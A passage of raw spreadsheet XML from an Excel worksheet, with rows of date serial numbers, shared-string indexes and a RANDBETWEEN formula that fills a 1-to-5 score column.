      <c r="F15637">
        <f t="shared" ca="1" si="244"/>
        <v>5</v>
      </c>
    </row>
    <row r="15638" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A15638" s="1">
        <v>43216.151342592595</v>
      </c>
      <c r="C15638" t="s">
        <v>454</v>
      </c>
      <c r="D15638" t="s">
        <v>222</v>
      </c>
      <c r="E15638" s="2" t="s">
        <v>14067</v>
      </c>
      <c r="F15638">
        <f t="shared" ca="1" si="244"/>
        <v>3</v>
      </c>
    </row>
    <row r="15639" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A15639" s="1">
        <v>43216.148275462961</v>
      </c>
      <c r="C15639" t="s">
        <v>65</v>
      </c>
      <c r="E15639" s="2" t="s">
        <v>14068</v>
      </c>
      <c r="F15639">
        <f t="shared" ca="1" si="244"/>
        <v>1</v>
      </c>
    </row>
    <row r="15640" spans="1:6" ht="330" x14ac:dyDescent="0.25">
      <c r="A15640" s="1">
        <v>43216.141608796293</v>
      </c>
      <c r="C15640" t="s">
        <v>197</v>
      </c>
      <c r="E15640" s="2" t="s">
        <v>14069</v>
      </c>
      <c r="F15640">
        <f t="shared" ca="1" si="244"/>
        <v>3</v>
      </c>
    </row>
    <row r="15641" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15641" s="1">
        <v>43216.139803240738</v>
      </c>
      <c r="C15641" t="s">
        <v>776</v>
      </c>
      <c r="E15641" t="s">
        <v>14070</v>
      </c>
      <c r="F15641">
        <f t="shared" ca="1" si="244"/>
        <v>4</v>
      </c>
    </row>
    <row r="15642" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A15642" s="1">
        <v>43216.095995370371</v>
      </c>
      <c r="C15642" t="s">
        <v>71</v>
      </c>
      <c r="E15642" s="2" t="s">
        <v>14071</v>
      </c>
      <c r="F15642">
        <f t="shared" ca="1" si="244"/>
        <v>2</v>
      </c>
    </row>
    <row r="15643" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A15643" s="1">
        <v>43216.092395833337</v>
      </c>
      <c r="C15643" t="s">
        <v>319</v>
      </c>
      <c r="D15643" t="s">
        <v>312</v>
      </c>
      <c r="E15643" s="2" t="s">
        <v>14072</v>
      </c>
      <c r="F15643">
        <f t="shared" ca="1" si="244"/>
        <v>1</v>
      </c>
    </row>
    <row r="15644" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15644" s="1">
        <v>43216.085405092592</v>
      </c>
      <c r="C15644" t="s">
        <v>3443</v>
      </c>
      <c r="E15644" t="s">
        <v>14073</v>
      </c>
      <c r="F15644">
        <f t="shared" ca="1" si="244"/>
        <v>5</v>
      </c>
    </row>
    <row r="15645" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15645" s="1">
        <v>43216.074837962966</v>
      </c>
      <c r="C15645" t="s">
        <v>5162</v>
      </c>
      <c r="D15645" t="s">
        <v>151</v>
      </c>
      <c r="E15645" t="s">
        <v>14074</v>
      </c>
      <c r="F15645">
        <f t="shared" ca="1" si="244"/>
        <v>3</v>
      </c>
    </row>
    <row r="15646" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A15646" s="1">
        <v>43216.073993055557</v>
      </c>
      <c r="C15646" t="s">
        <v>140</v>
      </c>
      <c r="D15646" t="s">
        <v>141</v>
      </c>
      <c r="E15646" s="2" t="s">
        <v>14075</v>
      </c>
      <c r="F15646">
        <f t="shared" ca="1" si="244"/>
        <v>1</v>
      </c>
    </row>
    <row r="15647" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15647" s="1">
        <v>43216.031550925924</v>
      </c>
      <c r="C15647" t="s">
        <v>724</v>
      </c>
      <c r="E15647" t="s">
        <v>14076</v>
      </c>
      <c r="F15647">
        <f t="shared" ca="1" si="244"/>
        <v>3</v>
      </c>
    </row>
    <row r="15648" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A15648" s="1">
        <v>43216.009560185186</v>
      </c>
      <c r="C15648" t="s">
        <v>1130</v>
      </c>
      <c r="D15648" t="s">
        <v>33</v>
      </c>
      <c r="E15648" s="2" t="s">
        <v>14077</v>
      </c>
      <c r="F15648">
        <f t="shared" ca="1" si="244"/>
        <v>2</v>
      </c>
    </row>
    <row r="15649" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A15649" s="1">
        <v>43215.963043981479</v>
      </c>
      <c r="C15649" t="s">
        <v>1064</v>
      </c>
      <c r="D15649" t="s">
        <v>232</v>
      </c>
      <c r="E15649" s="2" t="s">
        <v>14078</v>
      </c>
      <c r="F15649">
        <f t="shared" ca="1" si="244"/>
        <v>5</v>
      </c>
    </row>
    <row r="15650" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15650" s="1">
        <v>43215.93340277778</v>
      </c>
      <c r="C15650" t="s">
        <v>6</v>
      </c>
      <c r="D15650" t="s">
        <v>25</v>
      </c>
      <c r="F15650">
        <f t="shared" ca="1" si="244"/>
        <v>4</v>
      </c>
    </row>
    <row r="15651" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A15651" s="1">
        <v>43215.773101851853</v>
      </c>
      <c r="C15651" t="s">
        <v>10</v>
      </c>
      <c r="D15651" t="s">
        <v>20</v>
      </c>
      <c r="E15651" s="2" t="s">
        <v>14079</v>
      </c>
      <c r="F15651">
        <f t="shared" ca="1" si="244"/>
        <v>3</v>
      </c>
    </row>
    <row r="15652" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15652" s="1">
        <v>43215.752488425926</v>
      </c>
      <c r="C15652" t="s">
        <v>6</v>
      </c>
      <c r="D15652" t="s">
        <v>114</v>
      </c>
      <c r="E15652" t="s">
        <v>14080</v>
      </c>
      <c r="F15652">
        <f t="shared" ca="1" si="244"/>
        <v>4</v>
      </c>
    </row>
    <row r="15653" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15653" s="1">
        <v>43215.731516203705</v>
      </c>
      <c r="C15653" t="s">
        <v>10</v>
      </c>
      <c r="D15653" t="s">
        <v>46</v>
      </c>
      <c r="E15653" t="s">
        <v>14081</v>
      </c>
      <c r="F15653">
        <f t="shared" ca="1" si="244"/>
        <v>3</v>
      </c>
    </row>
    <row r="15654" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15654" s="1">
        <v>43215.720937500002</v>
      </c>
      <c r="C15654" t="s">
        <v>10</v>
      </c>
      <c r="D15654" t="s">
        <v>36</v>
      </c>
      <c r="E15654" t="s">
        <v>14082</v>
      </c>
      <c r="F15654">
        <f t="shared" ca="1" si="244"/>
        <v>2</v>
      </c>
    </row>
    <row r="15655" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15655" s="1">
        <v>43215.711180555554</v>
      </c>
      <c r="C15655" t="s">
        <v>10</v>
      </c>
      <c r="D15655" t="s">
        <v>271</v>
      </c>
      <c r="E15655" t="s">
        <v>14083</v>
      </c>
      <c r="F15655">
        <f t="shared" ca="1" si="244"/>
        <v>4</v>
      </c>
    </row>
    <row r="15656" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A15656" s="1">
        <v>43215.707430555558</v>
      </c>
      <c r="C15656" t="s">
        <v>10</v>
      </c>
      <c r="D15656" t="s">
        <v>290</v>
      </c>
      <c r="E15656" s="2" t="s">
        <v>14084</v>
      </c>
      <c r="F15656">
        <f t="shared" ca="1" si="244"/>
        <v>4</v>
      </c>
    </row>
    <row r="15657" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A15657" s="1">
        <v>43215.705393518518</v>
      </c>
      <c r="C15657" t="s">
        <v>10</v>
      </c>
      <c r="D15657" t="s">
        <v>192</v>
      </c>
      <c r="E15657" s="2" t="s">
        <v>14085</v>
      </c>
      <c r="F15657">
        <f t="shared" ca="1" si="244"/>
        <v>3</v>
      </c>
    </row>
    <row r="15658" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15658" s="1">
        <v>43215.699895833335</v>
      </c>
      <c r="C15658" t="s">
        <v>6</v>
      </c>
      <c r="D15658" t="s">
        <v>25</v>
      </c>
      <c r="E15658" t="s">
        <v>14086</v>
      </c>
      <c r="F15658">
        <f t="shared" ca="1" si="244"/>
        <v>1</v>
      </c>
    </row>
    <row r="15659" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A15659" s="1">
        <v>43215.696342592593</v>
      </c>
      <c r="C15659" t="s">
        <v>542</v>
      </c>
      <c r="D15659" t="s">
        <v>107</v>
      </c>
      <c r="E15659" s="2" t="s">
        <v>14087</v>
      </c>
      <c r="F15659">
        <f t="shared" ca="1" si="244"/>
        <v>5</v>
      </c>
    </row>
    <row r="15660" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15660" s="1">
        <v>43215.678576388891</v>
      </c>
      <c r="C15660" t="s">
        <v>10</v>
      </c>
      <c r="D15660" t="s">
        <v>39</v>
      </c>
      <c r="E15660" t="s">
        <v>14088</v>
      </c>
      <c r="F15660">
        <f t="shared" ca="1" si="244"/>
        <v>3</v>
      </c>
    </row>
    <row r="15661" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15661" s="1">
        <v>43215.656944444447</v>
      </c>
      <c r="C15661" t="s">
        <v>10</v>
      </c>
      <c r="D15661" t="s">
        <v>20</v>
      </c>
      <c r="E15661" t="s">
        <v>14089</v>
      </c>
      <c r="F15661">
        <f t="shared" ca="1" si="244"/>
        <v>3</v>
      </c>
    </row>
    <row r="15662" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15662" s="1">
        <v>43215.641712962963</v>
      </c>
      <c r="C15662" t="s">
        <v>10</v>
      </c>
      <c r="D15662" t="s">
        <v>80</v>
      </c>
      <c r="E15662" t="s">
        <v>14090</v>
      </c>
      <c r="F15662">
        <f t="shared" ca="1" si="244"/>
        <v>4</v>
      </c>
    </row>
    <row r="15663" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A15663" s="1">
        <v>43215.637314814812</v>
      </c>
      <c r="C15663" t="s">
        <v>14</v>
      </c>
      <c r="D15663" t="s">
        <v>330</v>
      </c>
      <c r="E15663" s="2" t="s">
        <v>14091</v>
      </c>
      <c r="F15663">
        <f t="shared" ca="1" si="244"/>
        <v>4</v>
      </c>
    </row>
    <row r="15664" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15664" s="1">
        <v>43215.619004629632</v>
      </c>
      <c r="C15664" t="s">
        <v>10</v>
      </c>
      <c r="D15664" t="s">
        <v>6</v>
      </c>
      <c r="E15664" t="s">
        <v>14092</v>
      </c>
      <c r="F15664">
        <f t="shared" ca="1" si="244"/>
        <v>5</v>
      </c>
    </row>
    <row r="15665" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15665" s="1">
        <v>43215.614629629628</v>
      </c>
      <c r="C15665" t="s">
        <v>10</v>
      </c>
      <c r="D15665" t="s">
        <v>52</v>
      </c>
      <c r="E15665" t="s">
        <v>14093</v>
      </c>
      <c r="F15665">
        <f t="shared" ca="1" si="244"/>
        <v>3</v>
      </c>
    </row>
    <row r="15666" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A15666" s="1">
        <v>43215.594305555554</v>
      </c>
      <c r="C15666" t="s">
        <v>10</v>
      </c>
      <c r="D15666" t="s">
        <v>107</v>
      </c>
      <c r="E15666" s="2" t="s">
        <v>14094</v>
      </c>
      <c r="F15666">
        <f t="shared" ca="1" si="244"/>
        <v>3</v>
      </c>
    </row>
    <row r="15667" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15667" s="1">
        <v>43215.592962962961</v>
      </c>
      <c r="C15667" t="s">
        <v>10</v>
      </c>
      <c r="D15667" t="s">
        <v>192</v>
      </c>
      <c r="E15667" t="s">
        <v>14095</v>
      </c>
      <c r="F15667">
        <f t="shared" ca="1" si="244"/>
        <v>2</v>
      </c>
    </row>
    <row r="15668" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A15668" s="1">
        <v>43215.585706018515</v>
      </c>
      <c r="C15668" t="s">
        <v>189</v>
      </c>
      <c r="D15668" t="s">
        <v>89</v>
      </c>
      <c r="E15668" s="2" t="s">
        <v>14096</v>
      </c>
      <c r="F15668">
        <f t="shared" ca="1" si="244"/>
        <v>2</v>
      </c>
    </row>
    <row r="15669" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A15669" s="1">
        <v>43215.582870370374</v>
      </c>
      <c r="C15669" t="s">
        <v>10</v>
      </c>
      <c r="D15669" t="s">
        <v>6</v>
      </c>
      <c r="E15669" s="2" t="s">
        <v>14097</v>
      </c>
      <c r="F15669">
        <f t="shared" ca="1" si="244"/>
        <v>2</v>
      </c>
    </row>
    <row r="15670" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A15670" s="1">
        <v>43215.569861111115</v>
      </c>
      <c r="C15670" t="s">
        <v>6</v>
      </c>
      <c r="D15670" t="s">
        <v>25</v>
      </c>
      <c r="E15670" s="2" t="s">
        <v>14098</v>
      </c>
      <c r="F15670">
        <f t="shared" ca="1" si="244"/>
        <v>3</v>
      </c>
    </row>
    <row r="15671" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A15671" s="1">
        <v>43215.563032407408</v>
      </c>
      <c r="C15671" t="s">
        <v>836</v>
      </c>
      <c r="E15671" s="2" t="s">
        <v>14099</v>
      </c>
      <c r="F15671">
        <f t="shared" ca="1" si="244"/>
        <v>5</v>
      </c>
    </row>
    <row r="15672" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15672" s="1">
        <v>43215.518564814818</v>
      </c>
      <c r="C15672" t="s">
        <v>10</v>
      </c>
      <c r="D15672" t="s">
        <v>1036</v>
      </c>
      <c r="E15672" t="s">
        <v>14100</v>
      </c>
      <c r="F15672">
        <f t="shared" ca="1" si="244"/>
        <v>3</v>
      </c>
    </row>
    <row r="15673" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A15673" s="1">
        <v>43215.515787037039</v>
      </c>
      <c r="C15673" t="s">
        <v>454</v>
      </c>
      <c r="D15673" t="s">
        <v>158</v>
      </c>
      <c r="E15673" s="2" t="s">
        <v>14101</v>
      </c>
      <c r="F15673">
        <f t="shared" ca="1" si="244"/>
        <v>5</v>
      </c>
    </row>
    <row r="15674" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15674" s="1">
        <v>43215.51221064815</v>
      </c>
      <c r="C15674" t="s">
        <v>10</v>
      </c>
      <c r="D15674" t="s">
        <v>17</v>
      </c>
      <c r="E15674" t="s">
        <v>14102</v>
      </c>
      <c r="F15674">
        <f t="shared" ca="1" si="244"/>
        <v>4</v>
      </c>
    </row>
    <row r="15675" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15675" s="1">
        <v>43215.51153935185</v>
      </c>
      <c r="C15675" t="s">
        <v>10</v>
      </c>
      <c r="D15675" t="s">
        <v>36</v>
      </c>
      <c r="E15675" t="s">
        <v>14103</v>
      </c>
      <c r="F15675">
        <f t="shared" ca="1" si="244"/>
        <v>2</v>
      </c>
    </row>
    <row r="15676" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A15676" s="1">
        <v>43215.49795138889</v>
      </c>
      <c r="C15676" t="s">
        <v>10</v>
      </c>
      <c r="D15676" t="s">
        <v>158</v>
      </c>
      <c r="E15676" s="2" t="s">
        <v>14104</v>
      </c>
      <c r="F15676">
        <f t="shared" ca="1" si="244"/>
        <v>4</v>
      </c>
    </row>
    <row r="15677" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15677" s="1">
        <v>43215.496342592596</v>
      </c>
      <c r="C15677" t="s">
        <v>10</v>
      </c>
      <c r="D15677" t="s">
        <v>107</v>
      </c>
      <c r="E15677" t="s">
        <v>14105</v>
      </c>
      <c r="F15677">
        <f t="shared" ca="1" si="244"/>
        <v>1</v>
      </c>
    </row>
    <row r="15678" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15678" s="1">
        <v>43215.489930555559</v>
      </c>
      <c r="C15678" t="s">
        <v>10</v>
      </c>
      <c r="D15678" t="s">
        <v>52</v>
      </c>
      <c r="E15678" t="s">
        <v>14106</v>
      </c>
      <c r="F15678">
        <f t="shared" ca="1" si="244"/>
        <v>4</v>
      </c>
    </row>
    <row r="15679" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15679" s="1">
        <v>43215.48814814815</v>
      </c>
      <c r="C15679" t="s">
        <v>260</v>
      </c>
      <c r="E15679" t="s">
        <v>14107</v>
      </c>
      <c r="F15679">
        <f t="shared" ca="1" si="244"/>
        <v>4</v>
      </c>
    </row>
    <row r="15680" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15680" s="1">
        <v>43215.472534722219</v>
      </c>
      <c r="C15680" t="s">
        <v>463</v>
      </c>
      <c r="D15680" t="s">
        <v>41</v>
      </c>
      <c r="E15680" t="s">
        <v>14108</v>
      </c>
      <c r="F15680">
        <f t="shared" ca="1" si="244"/>
        <v>1</v>
      </c>
    </row>
    <row r="15681" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A15681" s="1">
        <v>43215.470150462963</v>
      </c>
      <c r="C15681" t="s">
        <v>6</v>
      </c>
      <c r="D15681" t="s">
        <v>25</v>
      </c>
      <c r="E15681" s="2" t="s">
        <v>14109</v>
      </c>
      <c r="F15681">
        <f t="shared" ca="1" si="244"/>
        <v>5</v>
      </c>
    </row>
    <row r="15682" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15682" s="1">
        <v>43215.469282407408</v>
      </c>
      <c r="C15682" t="s">
        <v>6</v>
      </c>
      <c r="D15682" t="s">
        <v>114</v>
      </c>
      <c r="E15682" t="s">
        <v>14110</v>
      </c>
      <c r="F15682">
        <f t="shared" ref="F15682:F15745" ca="1" si="245">RANDBETWEEN(1,5)</f>
        <v>4</v>
      </c>
    </row>
    <row r="15683" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15683" s="1">
        <v>43215.4608912037</v>
      </c>
      <c r="C15683" t="s">
        <v>10</v>
      </c>
      <c r="D15683" t="s">
        <v>112</v>
      </c>
      <c r="E15683" t="s">
        <v>14111</v>
      </c>
      <c r="F15683">
        <f t="shared" ca="1" si="245"/>
        <v>3</v>
      </c>
    </row>
    <row r="15684" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A15684" s="1">
        <v>43215.459270833337</v>
      </c>
      <c r="C15684" t="s">
        <v>103</v>
      </c>
      <c r="E15684" s="2" t="s">
        <v>14112</v>
      </c>
      <c r="F15684">
        <f t="shared" ca="1" si="245"/>
        <v>2</v>
      </c>
    </row>
    <row r="15685" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A15685" s="1">
        <v>43215.459062499998</v>
      </c>
      <c r="C15685" t="s">
        <v>189</v>
      </c>
      <c r="D15685" t="s">
        <v>222</v>
      </c>
      <c r="E15685" s="2" t="s">
        <v>14113</v>
      </c>
      <c r="F15685">
        <f t="shared" ca="1" si="245"/>
        <v>3</v>
      </c>
    </row>
    <row r="15686" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15686" s="1">
        <v>43215.457754629628</v>
      </c>
      <c r="C15686" t="s">
        <v>10</v>
      </c>
      <c r="D15686" t="s">
        <v>17</v>
      </c>
      <c r="F15686">
        <f t="shared" ca="1" si="245"/>
        <v>4</v>
      </c>
    </row>
    <row r="15687" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A15687" s="1">
        <v>43215.454930555556</v>
      </c>
      <c r="C15687" t="s">
        <v>10</v>
      </c>
      <c r="D15687" t="s">
        <v>178</v>
      </c>
      <c r="E15687" s="2" t="s">
        <v>14114</v>
      </c>
      <c r="F15687">
        <f t="shared" ca="1" si="245"/>
        <v>1</v>
      </c>
    </row>
    <row r="15688" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A15688" s="1">
        <v>43215.426863425928</v>
      </c>
      <c r="C15688" t="s">
        <v>10</v>
      </c>
      <c r="D15688" t="s">
        <v>192</v>
      </c>
      <c r="E15688" s="2" t="s">
        <v>14115</v>
      </c>
      <c r="F15688">
        <f t="shared" ca="1" si="245"/>
        <v>3</v>
      </c>
    </row>
    <row r="15689" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A15689" s="1">
        <v>43215.417395833334</v>
      </c>
      <c r="C15689" t="s">
        <v>48</v>
      </c>
      <c r="E15689" s="2" t="s">
        <v>14116</v>
      </c>
      <c r="F15689">
        <f t="shared" ca="1" si="245"/>
        <v>1</v>
      </c>
    </row>
    <row r="15690" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A15690" s="1">
        <v>43215.407800925925</v>
      </c>
      <c r="C15690" t="s">
        <v>189</v>
      </c>
      <c r="D15690" t="s">
        <v>67</v>
      </c>
      <c r="E15690" s="2" t="s">
        <v>14117</v>
      </c>
      <c r="F15690">
        <f t="shared" ca="1" si="245"/>
        <v>4</v>
      </c>
    </row>
    <row r="15691" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A15691" s="1">
        <v>43215.393310185187</v>
      </c>
      <c r="C15691" t="s">
        <v>535</v>
      </c>
      <c r="D15691" t="s">
        <v>39</v>
      </c>
      <c r="E15691" s="2" t="s">
        <v>14118</v>
      </c>
      <c r="F15691">
        <f t="shared" ca="1" si="245"/>
        <v>5</v>
      </c>
    </row>
    <row r="15692" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A15692" s="1">
        <v>43215.390868055554</v>
      </c>
      <c r="C15692" t="s">
        <v>82</v>
      </c>
      <c r="D15692" t="s">
        <v>229</v>
      </c>
      <c r="E15692" s="2" t="s">
        <v>14119</v>
      </c>
      <c r="F15692">
        <f t="shared" ca="1" si="245"/>
        <v>3</v>
      </c>
    </row>
    <row r="15693" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A15693" s="1">
        <v>43215.385520833333</v>
      </c>
      <c r="C15693" t="s">
        <v>4508</v>
      </c>
      <c r="D15693" t="s">
        <v>11</v>
      </c>
      <c r="E15693" s="2" t="s">
        <v>14120</v>
      </c>
      <c r="F15693">
        <f t="shared" ca="1" si="245"/>
        <v>4</v>
      </c>
    </row>
    <row r="15694" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15694" s="1">
        <v>43215.378460648149</v>
      </c>
      <c r="C15694" t="s">
        <v>222</v>
      </c>
      <c r="E15694" t="s">
        <v>14121</v>
      </c>
      <c r="F15694">
        <f t="shared" ca="1" si="245"/>
        <v>4</v>
      </c>
    </row>
    <row r="15695" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15695" s="1">
        <v>43215.376516203702</v>
      </c>
      <c r="C15695" t="s">
        <v>10</v>
      </c>
      <c r="D15695" t="s">
        <v>6</v>
      </c>
      <c r="E15695" t="s">
        <v>14122</v>
      </c>
      <c r="F15695">
        <f t="shared" ca="1" si="245"/>
        <v>2</v>
      </c>
    </row>
    <row r="15696" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A15696" s="1">
        <v>43215.341909722221</v>
      </c>
      <c r="C15696" t="s">
        <v>10</v>
      </c>
      <c r="D15696" t="s">
        <v>41</v>
      </c>
      <c r="E15696" s="2" t="s">
        <v>14123</v>
      </c>
      <c r="F15696">
        <f t="shared" ca="1" si="245"/>
        <v>1</v>
      </c>
    </row>
    <row r="15697" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15697" s="1">
        <v>43215.333877314813</v>
      </c>
      <c r="C15697" t="s">
        <v>686</v>
      </c>
      <c r="E15697" t="s">
        <v>14124</v>
      </c>
      <c r="F15697">
        <f t="shared" ca="1" si="245"/>
        <v>3</v>
      </c>
    </row>
    <row r="15698" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A15698" s="1">
        <v>43215.275729166664</v>
      </c>
      <c r="C15698" t="s">
        <v>48</v>
      </c>
      <c r="E15698" s="2" t="s">
        <v>14125</v>
      </c>
      <c r="F15698">
        <f t="shared" ca="1" si="245"/>
        <v>1</v>
      </c>
    </row>
    <row r="15699" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15699" s="1">
        <v>43215.270694444444</v>
      </c>
      <c r="C15699" t="s">
        <v>318</v>
      </c>
      <c r="E15699" t="s">
        <v>14126</v>
      </c>
      <c r="F15699">
        <f t="shared" ca="1" si="245"/>
        <v>3</v>
      </c>
    </row>
    <row r="15700" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15700" s="1">
        <v>43215.268541666665</v>
      </c>
      <c r="C15700" t="s">
        <v>16</v>
      </c>
      <c r="F15700">
        <f t="shared" ca="1" si="245"/>
        <v>3</v>
      </c>
    </row>
    <row r="15701" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A15701" s="1">
        <v>43215.249409722222</v>
      </c>
      <c r="C15701" t="s">
        <v>724</v>
      </c>
      <c r="D15701" t="s">
        <v>23</v>
      </c>
      <c r="E15701" s="2" t="s">
        <v>14127</v>
      </c>
      <c r="F15701">
        <f t="shared" ca="1" si="245"/>
        <v>4</v>
      </c>
    </row>
    <row r="15702" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A15702" s="1">
        <v>43215.248564814814</v>
      </c>
      <c r="C15702" t="s">
        <v>1130</v>
      </c>
      <c r="D15702" t="s">
        <v>271</v>
      </c>
      <c r="E15702" s="2" t="s">
        <v>14128</v>
      </c>
      <c r="F15702">
        <f t="shared" ca="1" si="245"/>
        <v>2</v>
      </c>
    </row>
    <row r="15703" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15703" s="1">
        <v>43215.241018518522</v>
      </c>
      <c r="C15703" t="s">
        <v>2082</v>
      </c>
      <c r="D15703" t="s">
        <v>312</v>
      </c>
      <c r="E15703" t="s">
        <v>14129</v>
      </c>
      <c r="F15703">
        <f t="shared" ca="1" si="245"/>
        <v>3</v>
      </c>
    </row>
    <row r="15704" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A15704" s="1">
        <v>43215.231585648151</v>
      </c>
      <c r="C15704" t="s">
        <v>189</v>
      </c>
      <c r="D15704" t="s">
        <v>1036</v>
      </c>
      <c r="E15704" s="2" t="s">
        <v>14130</v>
      </c>
      <c r="F15704">
        <f t="shared" ca="1" si="245"/>
        <v>3</v>
      </c>
    </row>
    <row r="15705" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A15705" s="1">
        <v>43215.196226851855</v>
      </c>
      <c r="C15705" t="s">
        <v>8808</v>
      </c>
      <c r="D15705" t="s">
        <v>163</v>
      </c>
      <c r="E15705" s="2" t="s">
        <v>14131</v>
      </c>
      <c r="F15705">
        <f t="shared" ca="1" si="245"/>
        <v>2</v>
      </c>
    </row>
    <row r="15706" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15706" s="1">
        <v>43215.178356481483</v>
      </c>
      <c r="C15706" t="s">
        <v>48</v>
      </c>
      <c r="E15706" t="s">
        <v>14132</v>
      </c>
      <c r="F15706">
        <f t="shared" ca="1" si="245"/>
        <v>2</v>
      </c>
    </row>
    <row r="15707" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A15707" s="1">
        <v>43215.173055555555</v>
      </c>
      <c r="C15707" t="s">
        <v>14</v>
      </c>
      <c r="D15707" t="s">
        <v>33</v>
      </c>
      <c r="E15707" s="2" t="s">
        <v>14133</v>
      </c>
      <c r="F15707">
        <f t="shared" ca="1" si="245"/>
        <v>1</v>
      </c>
    </row>
    <row r="15708" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15708" s="1">
        <v>43215.116099537037</v>
      </c>
      <c r="C15708" t="s">
        <v>41</v>
      </c>
      <c r="E15708" t="s">
        <v>14134</v>
      </c>
      <c r="F15708">
        <f t="shared" ca="1" si="245"/>
        <v>3</v>
      </c>
    </row>
    <row r="15709" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A15709" s="1">
        <v>43215.102002314816</v>
      </c>
      <c r="C15709" t="s">
        <v>71</v>
      </c>
      <c r="E15709" s="2" t="s">
        <v>14135</v>
      </c>
      <c r="F15709">
        <f t="shared" ca="1" si="245"/>
        <v>4</v>
      </c>
    </row>
    <row r="15710" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15710" s="1">
        <v>43215.079907407409</v>
      </c>
      <c r="C15710" t="s">
        <v>41</v>
      </c>
      <c r="E15710" t="s">
        <v>14136</v>
      </c>
      <c r="F15710">
        <f t="shared" ca="1" si="245"/>
        <v>2</v>
      </c>
    </row>
    <row r="15711" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A15711" s="1">
        <v>43215.068252314813</v>
      </c>
      <c r="C15711" t="s">
        <v>7491</v>
      </c>
      <c r="D15711" t="s">
        <v>263</v>
      </c>
      <c r="E15711" s="2" t="s">
        <v>14137</v>
      </c>
      <c r="F15711">
        <f t="shared" ca="1" si="245"/>
        <v>2</v>
      </c>
    </row>
    <row r="15712" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A15712" s="1">
        <v>43215.067662037036</v>
      </c>
      <c r="C15712" t="s">
        <v>6728</v>
      </c>
      <c r="D15712" t="s">
        <v>271</v>
      </c>
      <c r="E15712" s="2" t="s">
        <v>14138</v>
      </c>
      <c r="F15712">
        <f t="shared" ca="1" si="245"/>
        <v>5</v>
      </c>
    </row>
    <row r="15713" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15713" s="1">
        <v>43215.039502314816</v>
      </c>
      <c r="C15713" t="s">
        <v>43</v>
      </c>
      <c r="E15713" t="s">
        <v>14139</v>
      </c>
      <c r="F15713">
        <f t="shared" ca="1" si="245"/>
        <v>2</v>
      </c>
    </row>
    <row r="15714" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15714" s="1">
        <v>43214.953715277778</v>
      </c>
